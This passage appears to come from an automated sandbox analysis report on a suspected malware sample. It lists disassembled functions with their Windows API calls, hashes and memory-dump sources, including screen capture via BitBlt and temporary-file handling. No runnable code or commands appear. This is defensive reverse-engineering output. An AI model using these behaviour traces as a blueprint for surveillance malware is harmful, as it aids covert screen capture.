                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0F0AF362007045FEB245F39DC81B6A7B95EB86B6CF15442EEB058B650D7B198028A44
                                                                                                                                                                                                                                                                    Function 024F5427 Relevance: 1.5, APIs: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,024F047A,?,00000004), ref: 024F547A
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                    • Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                                                                                                                                                                                    • Instruction ID: 54da1688a597f168057d7d3f3419851e5cd8debd37b56572a07c095bfce91af3
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96F02B31680318BFDB015F51CC01F6E7B66EF44F12F50411AFD0566290DB718D20AACA
                                                                                                                                                                                                                                                                    Function 00434DCD Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 0042E3ED: EnterCriticalSection.KERNEL32(?,?,00431C7A,?,00457A38,00000008,00431D48,?,?,?), ref: 0042E3FC
                                                                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 00434E05
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1272433827-0
                                                                                                                                                                                                                                                                    • Opcode ID: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
                                                                                                                                                                                                                                                                    • Instruction ID: 538c22e4eb892f32bc8c86ea5e443232934619ae82977abc573478e901e73d8c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4F04F32A103009FE710EF69D906B9D77E1AF05726F10416AF910DB2E2CB7999808F49
                                                                                                                                                                                                                                                                    Function 024F5034 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 024EE654: RtlEnterCriticalSection.NTDLL(02070DAF), ref: 024EE663
                                                                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 024F506C
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1272433827-0
                                                                                                                                                                                                                                                                    • Opcode ID: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
                                                                                                                                                                                                                                                                    • Instruction ID: eb4735233013f534b63ada52e05664a4d822d9e8a6e3a35913ff8f234af06f75
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FBF08C32A10300DFEB10EF69D801B4C77E1AF05722F10416AF900DB2A1C77589448F4A
                                                                                                                                                                                                                                                                    Function 0043B282 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0043BA44,004307B5,?,?,?,?,?,004307B5,?,?,?), ref: 0043B2B9
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2016158738-0
                                                                                                                                                                                                                                                                    • Opcode ID: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
                                                                                                                                                                                                                                                                    • Instruction ID: ec76e124c96d5fb6d75208995366108955e3ecd697e122142a5eb02f601840fd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8F0553A30020897CB089F7BE81976BBF90EFC5754F0A409EEF098B290C3399942C794
                                                                                                                                                                                                                                                                    Function 024FB4E9 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
                                                                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,024FBCAB,024F0A1C,?,?,?,?,?,024F0A1C,?,?,?), ref: 024FB520
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2016158738-0
                                                                                                                                                                                                                                                                    • Opcode ID: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
                                                                                                                                                                                                                                                                    • Instruction ID: 68d32d313e7cd56293a75c5be2e7a9e757f88f82f08f61895820b11ee7e3ce6f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42F0553A30020857CB089F36DC0476BBF90EFC2754B0A005EEF098B290C3759842C790
                                                                                                                                                                                                                                                                    Function 00410666 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00010672,0040FBF9), ref: 0041066B
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                    • Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                                                                                                                                                                                    • Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                    Function 024D08CD Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00410672,024CFE60), ref: 024D08D2
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                    • Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                                                                                                                                                                                    • Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                    Function 0043BBC1 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: HeapProcess
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 54951025-0
                                                                                                                                                                                                                                                                    • Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                                                                                                                                                                                                    • Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08
                                                                                                                                                                                                                                                                    Function 004373D9 Relevance: .6, Instructions: 637COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                                                                                                                                                                                                    • Instruction ID: 2844b30024e45351147ede59872166b67bb7d3639a7d84f230d679a3a0c0a750
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32325761D69F014DE733A634C822336A258AFBB3D4F15E737E85AB5EA5EB2CC4834105
                                                                                                                                                                                                                                                                    Function 004071AB Relevance: .4, Instructions: 378COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
                                                                                                                                                                                                                                                                    • Instruction ID: d13affd36985adaba9549dda1076aa7943650852f65e7c6b0ce314185b1835a0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88E18470A08612EFD714CF24C590AAAB7F1FF44304B54457EE846ABB81D738F862DB96
                                                                                                                                                                                                                                                                    Function 024E76EB Relevance: .4, Instructions: 356COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                                                                                                                                                                                                                                    • Instruction ID: f3b5f5190805b4698d63a461b06847c9acc7f3e95b14f595c6eda227b594814b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17D1B3721085A20AEF2D4A39847003BFFE26A521B730D479FD8F7CA6D2EF24D595D660
                                                                                                                                                                                                                                                                    Function 0042D4EE Relevance: .2, Instructions: 237COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
                                                                                                                                                                                                                                                                    • Instruction ID: 543360d7dfb9058b4a8e0476cf2bcab449255d23345d35b398e8df16a867321f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 856154B1F0073876DA385A2CB892BBF63849F41748FE4041BE447DB381D69DDD82865E
                                                                                                                                                                                                                                                                    Function 024ED755 Relevance: .2, Instructions: 237COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                                                                                                                                                                                                    • Instruction ID: 6fd82bfd921a4e0dfad55dc1dac07c35dcfbd6e2df2d00757058fac3d07aa892
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED613831E00B04DAFE386A2888517BF639EBF55A4BF04051BE8A3DB3C4D7159986C755
                                                                                                                                                                                                                                                                    Function 00428560 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                                    • Instruction ID: e183cc42c0575e46eff71331dfd644b760227977963c57612164f9205c38e507
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 631138773030B1A3D604862DF8B46BFA395EBE63217EC426FC0424B748CE6AE9C1950C
                                                                                                                                                                                                                                                                    Function 024E87C7 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                                    • Instruction ID: 44d39b294b373855e9238f4a0498103ab3e5305471e12ef49ac131f11b0c1c86
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D11087720004247FE19862ED9B42BBE385FAC522AB2C577BD8634B778D322D145D600
                                                                                                                                                                                                                                                                    Function 009F9823 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623077365.00000000009F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 009F9000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9f9000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                                    • Instruction ID: 9cc36ecf668e2899a19adf54be0094a069d7649bab8b886230db3a790aa09711
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E118272340104AFDB54DF55DC81FA673EAEB89370B298065EE04CB316D676EC41C760
                                                                                                                                                                                                                                                                    Function 024C0D90 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                                    • Instruction ID: 282f36453e78a46ab25232ea44878a20f757f6c52a57e84fc00a9fc6754f5c84
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F01F77A610600CFDF61CF28C904BAB33E9EB85205F1550AAD50697341E370A8418B90
                                                                                                                                                                                                                                                                    Function 004020FA Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 205COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • DefWindowProcW.USER32(?,00000014,?,?), ref: 00402135
                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040214A
                                                                                                                                                                                                                                                                    • GetDC.USER32(?), ref: 00402151
                                                                                                                                                                                                                                                                    • CreateSolidBrush.GDI32(00646464), ref: 00402164
                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00402178
                                                                                                                                                                                                                                                                    • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402183
                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00402191
                                                                                                                                                                                                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021A4
                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021AF
                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(00000008,00000000), ref: 004021B8
                                                                                                                                                                                                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021DC
                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004021EA
                                                                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00402267
                                                                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00402276
                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0040227F
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
                                                                                                                                                                                                                                                                    • String ID: Tahoma
                                                                                                                                                                                                                                                                    • API String ID: 3832963559-3580928618
                                                                                                                                                                                                                                                                    • Opcode ID: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
                                                                                                                                                                                                                                                                    • Instruction ID: 7336700d8ad07cb9e45a564d019af9580db2992b46b3f32d80e0fb6f80206702
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3710D72900228AFDB22DF64DD85FAEBBBCEF09751F0041A5B609E6155DA74AF80CF14
                                                                                                                                                                                                                                                                    Function 00402571 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 186windowkeyboardfileCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 004025CD
                                                                                                                                                                                                                                                                    • DefWindowProcW.USER32(?,00000204,?,?), ref: 004025DF
                                                                                                                                                                                                                                                                    • ReleaseCapture.USER32 ref: 004025F2
                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00402619
                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026A0
                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 004026A9
                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004026B3
                                                                                                                                                                                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026E1
                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 004026EA
                                                                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 004026FC
                                                                                                                                                                                                                                                                    • GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402717
                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00402731
                                                                                                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 00402738
